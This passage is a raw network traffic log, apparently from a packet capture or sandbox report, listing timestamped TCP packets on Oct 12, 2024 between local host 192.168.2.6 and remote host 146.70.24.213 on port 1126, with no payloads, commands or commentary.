Oct 12, 2024 20:30:06.436723948 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.436743975 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.436768055 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.436774969 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.436806917 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.436841011 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.436851978 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.436872959 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.436908007 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.436942101 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.436955929 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.436975002 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.436989069 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.437015057 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437048912 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437079906 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437100887 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.437115908 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437128067 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.437149048 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437181950 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437194109 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.437212944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437247038 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437262058 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.437299967 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437335014 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437386036 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.437386990 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437419891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437473059 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437478065 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.437525034 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437527895 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.437556028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437587023 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437602043 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.437623978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437659025 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437674999 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.437691927 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437726974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437760115 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437776089 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.437793970 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437808990 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.437827110 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437859058 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437891960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437906981 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.437922001 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437941074 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.437954903 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.437987089 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438000917 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.438021898 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438055038 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438087940 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438110113 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.438122034 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438137054 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.438154936 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438170910 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438186884 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438203096 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438220024 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438232899 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438249111 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438263893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438278913 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438313007 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438344955 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438463926 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.438463926 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.438716888 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438817978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438852072 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438874006 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.438884974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438918114 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438940048 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.438950062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.438982964 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439018011 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439029932 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.439054012 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439060926 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.439100981 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439133883 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439161062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439179897 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.439208984 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439209938 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.439260006 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439291954 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439308882 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.439322948 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439352036 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439398050 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.439429045 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439464092 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439471960 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.439495087 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439532995 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439567089 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439579010 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.439610958 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.439616919 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439651012 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439683914 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439728022 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.439735889 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439774036 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439805984 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439817905 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.439840078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439850092 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.439873934 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439907074 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439934969 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439948082 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.439968109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.439982891 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.440001011 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.440028906 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.440062046 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.440078974 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.440093994 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.440109968 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.440126896 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.440159082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.440190077 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.440201998 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.440233946 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.480580091 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.480650902 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.480688095 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.480722904 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.480756044 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.480757952 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.480787992 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.480809927 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.480822086 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.480844021 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.480858088 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.481060028 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.525075912 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.525118113 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.525152922 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.525185108 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.525192976 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.525218964 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.525234938 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.525250912 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.525288105 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.525345087 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.528189898 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.528223991 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.528263092 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.528275967 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.528307915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.528341055 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.528357029 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.528374910 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.528400898 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.528409004 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.528451920 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.529206991 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529261112 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529293060 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529342890 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529344082 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.529376030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529423952 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.529427052 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529459000 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529473066 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.529510975 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529562950 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529596090 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529608011 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.529628992 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529640913 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.529660940 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529691935 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529726028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529736996 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.529757977 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529767036 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.529792070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529824972 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529859066 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529875994 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.529892921 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529906034 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.529927015 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529961109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.529973984 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.530054092 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.530105114 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.530129910 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.530136108 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.530183077 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.530186892 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.530244112 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.530294895 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.530301094 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.530344963 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.530380011 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.530411959 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.530412912 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.530446053 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.530466080 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.530473948 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.530508041 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.530519009 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.530540943 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.530572891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.530594110 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.530606985 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.530647039 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.530658960 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.530877113 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.530941010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.530970097 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.530992031 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.531022072 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.531023026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.531056881 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.531101942 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.531106949 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.531140089 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.531189919 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.531197071 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.531223059 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.531272888 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.531275034 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.531326056 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.531358957 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.531372070 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.531414986 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.531449080 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.531475067 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.531481981 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.531529903 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.531558990 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.531579018 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.531593084 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.531624079 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.531626940 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.531657934 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.531670094 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.531692982 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.531727076 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.531759977 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.531773090 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.531812906 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.532099962 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.532133102 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.532166958 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.532181025 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.532217979 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.532250881 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.532283068 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.532290936 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.532332897 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.532342911 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.532385111 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.532414913 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.532430887 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.532447100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.532480001 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.532512903 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.532525063 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.532546997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.532555103 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.532582045 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.532617092 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.532627106 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.532644987 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.532692909 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.533217907 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.533344984 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.533376932 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.533401966 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.533427954 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.533461094 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.533483982 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.533493042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.533526897 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.533536911 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.533561945 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.533590078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.533621073 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.533632040 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.533654928 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.533688068 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.533713102 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.533721924 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.533755064 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.533776045 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.533788919 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.533808947 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.534174919 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.534208059 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.534241915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.534291029 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.534312963 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.534324884 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.534356117 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.534389973 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.534418106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.534425974 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.534463882 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.573554039 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.573607922 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.573622942 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.573646069 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.573679924 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.573715925 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.573729038 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.573750973 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.573762894 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.573787928 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.573817968 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.573836088 CEST	49710	1126	192.168.2.6	146.70.24.213
